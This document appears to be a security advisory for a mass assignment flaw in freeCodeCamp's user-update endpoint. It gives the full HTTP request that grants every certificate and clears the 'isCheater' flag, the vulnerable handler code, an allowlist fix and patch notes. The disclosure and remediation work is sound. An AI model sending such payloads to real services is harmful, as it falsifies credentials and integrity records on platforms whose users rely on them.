Description
The freeCodeCamp application allowed authenticated users to update their own details. A mass assignment vulnerability was discovered which allowed users to update any field of their profile, including certifications.
Impact
An attacker could use this vulnerability to award themselves all certificates on freeCodeCamp, or to change other user properties such as the "isCheater" flag to false.
Reproduction
A new account was created in the freeCodeCamp development/staging environment. The following request was sent to the /update-user-flag endpoint:
Request:
```http
PUT /update-user-flag HTTP/2
Host: api.freecodecamp.dev
Cookie: _csrf=lsCzfu4[...]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.freecodecamp.dev/
Csrf-Token: Tu0VHrwW-GJvZ4ly1sVEXjHxSzgPLLj99OLQ
Content-Type: application/json
Origin: https://www.freecodecamp.dev
Content-Length: 518
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers

{
  "name": "Mass Assignment",
  "isCheater": false,
  "isHonest": true,
  "isInfosecCertV7": true,
  "isApisMicroservicesCert": true,
  "isBackEndCert": true,
  "is2018DataVisCert": true,
  "isDataVisCert": true,
  "isFrontEndCert": true,
  "isFullStackCert": true,
  "isFrontEndLibsCert": true,
  "isInfosecQaCert": true,
  "isQaCertV7": true,
  "isInfosecCertV7": true,
  "isJsAlgoDataStructCert": true,
  "isRelationalDatabaseCertV8": true,
  "isRespWebDesignCert": true,
  "isSciCompPyCertV7": true,
  "isDataAnalysisPyCertV7": true,
  "isMachineLearningPyCertV7": true
}
```
Response:
```http
HTTP/2 200 OK
Date: Thu, 31 Mar 2022 18:10:45 GMT
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Vary: Origin, Accept-Encoding
Access-Control-Allow-Origin: https://www.freecodecamp.dev
Access-Control-Allow-Credentials: true
X-Fcc-Access-Token: eyJhbGciOi[...]

{"type":"success","message":"flash.updated-preferences"}
```
Afterwards, the user had all certificates listed on their profile, as shown in the screenshots below:
The origin of the finding was at https://github.com/freeCodeCamp/freeCodeCamp/blob/main/api-server/src/server/boot/settings.js#L207:
```js
function updateUserFlag(req, res, next) {
  const { user, body: update } = req;
  return user.updateAttributes(update, createStandardHandler(req, res, next));
}
```
The updateUserFlag() function updated all user attributes in the body of the request. The function was added as an API handler at https://github.com/freeCodeCamp/freeCodeCamp/blob/main/api-server/src/server/boot/settings.js#L39:
```js
api.put('/update-user-flag', ifNoUser401, updateUserFlag);
```
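The standard remediation for this class of bug is to allowlist the fields a user may set and discard everything else before the object reaches the model. The following is an added example, not freeCodeCamp's code: the members of ALLOWED_USER_FLAGS, the createStandardHandler stand-in and the makeUser model are assumptions constructed so that it runs offline.

```javascript
// Assumed allowlist of fields a user may change about themselves (the real set
// is a project decision). Certification and integrity flags (isCheater,
// is*Cert*) are deliberately absent: only server-side logic may set them.
const ALLOWED_USER_FLAGS = new Set(['name', 'theme', 'keyboardShortcuts']);

// Keep only allowlisted own properties of an untrusted JSON body and report
// which keys were dropped; a burst of rejected "is*Cert" keys is a useful
// detection signal for mass-assignment probing.
function pickAllowedFlags(body, allowed = ALLOWED_USER_FLAGS) {
  const update = {};
  const rejected = [];
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    return { update, rejected };
  }
  for (const key of Object.keys(body)) {
    if (allowed.has(key)) update[key] = body[key];
    else rejected.push(key);
  }
  return { update, rejected };
}

// Hardened replacement for the page's updateUserFlag: same handler shape,
// but only allowlisted keys reach updateAttributes.
function updateUserFlagHardened(req, res, next) {
  const { user, body } = req;
  const { update, rejected } = pickAllowedFlags(body);
  if (rejected.length) {
    console.warn(`user ${user.id}: ignored non-editable fields ${rejected.join(', ')}`);
  }
  return user.updateAttributes(update, createStandardHandler(req, res, next));
}

// Stand-ins constructed for this example: the project's createStandardHandler
// and a LoopBack-style user model exposing updateAttributes(update, callback).
function createStandardHandler(req, res, next) {
  return err => (err ? next(err) : res.json({ type: 'success' }));
}
function makeUser(initial) {
  return { ...initial, updateAttributes(update, cb) { Object.assign(this, update); cb(null); return this; } };
}

// Replay of the advisory's payload (abridged) against a constructed fresh account.
function demo() {
  const user = makeUser({ id: 'u1', name: 'new user', isCheater: true, isFrontEndCert: false });
  const body = { name: 'Mass Assignment', isCheater: false, isFrontEndCert: true, isInfosecCertV7: true };
  updateUserFlagHardened({ user, body }, { json: out => out }, err => { throw err; });
  return user;
}
```

With the allowlist in place the replayed payload only renames the account; the cheater and certificate flags keep their server-assigned values.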
Patches
Patched and deployed to the latest staging and production versions.
Workarounds
Not Applicable
Credits
This security concern was identified by Laurence Tennant working with IncludeSecurity.com